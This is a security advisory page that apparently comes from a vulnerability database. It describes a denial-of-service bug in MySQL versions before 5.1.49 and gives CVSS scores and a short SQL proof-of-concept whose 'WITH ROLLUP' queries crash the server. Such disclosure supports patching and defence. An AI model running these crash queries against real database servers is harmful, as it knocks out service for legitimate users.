Oracle MySQL < 5.1.49 'WITH ROLLUP' Denial Of Service Vulnerability

2010.12.03
Credit: Shane Bester
Risk: Low
Local: No
Remote: No
CWE: CWE-89


CVSS Base Score: 4/10
Impact Subscore: 2.9/10
Exploitability Subscore: 8/10
Exploit range: Remote
Attack complexity: Low
Authentication: Single time
Confidentiality impact: None
Integrity impact: None
Availability impact: Partial

Source: http://www.securityfocus.com/bid/42596/info MySQL is prone to a denial-of-service vulnerability. An attacker can exploit this issue to crash the database, denying access to legitimate users. This issue affects versions prior to MySQL 5.1.49. NOTE: This issue was previously covered in BID 42586 (Oracle MySQL Prior to 5.1.49 Multiple Denial Of Service Vulnerabilities) but has been assigned its own record to better document it. PoC: drop table if exists `t1`; create table `t1`(`a` int)engine=myisam; insert into `t1` values (1); /*crash1*/select (`a` in (`a`,`a`)) from `t1` group by `a` with rollup; /*crash2*/select (case (`a`) when (`a`) then (`a`) end) as `a` from `t1` group by `a` with rollup;


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top